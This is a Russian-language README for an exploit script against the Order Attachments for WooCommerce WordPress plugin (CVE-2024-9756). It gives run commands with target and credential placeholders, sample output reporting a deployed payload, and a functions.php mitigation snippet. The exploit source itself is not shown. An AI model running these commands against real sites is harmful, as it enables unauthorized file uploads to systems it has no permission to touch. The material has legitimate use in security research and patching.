
Order Attachments for WooCommerce 2.0 - 2.4.1 - Отсутствие авторизации для аутентифицированных (Subscriber+) ограниченная произвольная загрузка файлов
Этот эксплойт использует неавторизованную ограниченную уязвимость произвольной загрузки файлов в плагине Order Attachments for WooCommerce (версии 2.0 – 2.4.1) для WordPress.
Уязвимость позволяет аутентифицированным пользователям (Subscriber и выше) загружать ограниченные типы файлов без надлежащей авторизации.
Этот скрипт предназначен только для образовательных целей и исследований в области безопасности. Любое несанкционированное использование этого эксплойта в системах, которые вам не принадлежат, строго запрещено законом.
Убедитесь, что у вас есть следующее перед запуском эксплойта:
requests → Установка с помощью:
pip install requests
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD>
Пример:
python3 CVE-2024-9756.py -u http://192.168.100.74:888/wordpress4 -un khaled -p mypassword
Вы можете указать пользовательские имена файлов и идентификаторы заказов:
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> --filename="custom.png" --filetype="image/png"
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> -o 200
В случае успеха скрипт вернет URL загруженного файла:
[*] Initiating authentication...
[✔] Authentication successful.
[*] Deploying payload: Nxploit.jpg to order 196...
[✔] Payload successfully deployed!
🔗 File URL: http://192.168.100.74:888/wordpress4/wp-content/uploads/2025/03/Nxploit.jpg
functions.php, чтобы заблокировать wp_ajax_wcoa_add_attachment для неавторизованных пользователей:
if (!current_user_can('manage_woocommerce')) {
wp_send_json_error(['message' => 'Unauthorized'], 403);
exit;
}
Этот эксплойт публикуется только в образовательных целях и для исследований в области безопасности.
Несанкционированное использование против систем без явного разрешения незаконно и наказуемо в соответствии с законами о кибербезопасности.
Используйте на свой страх и риск.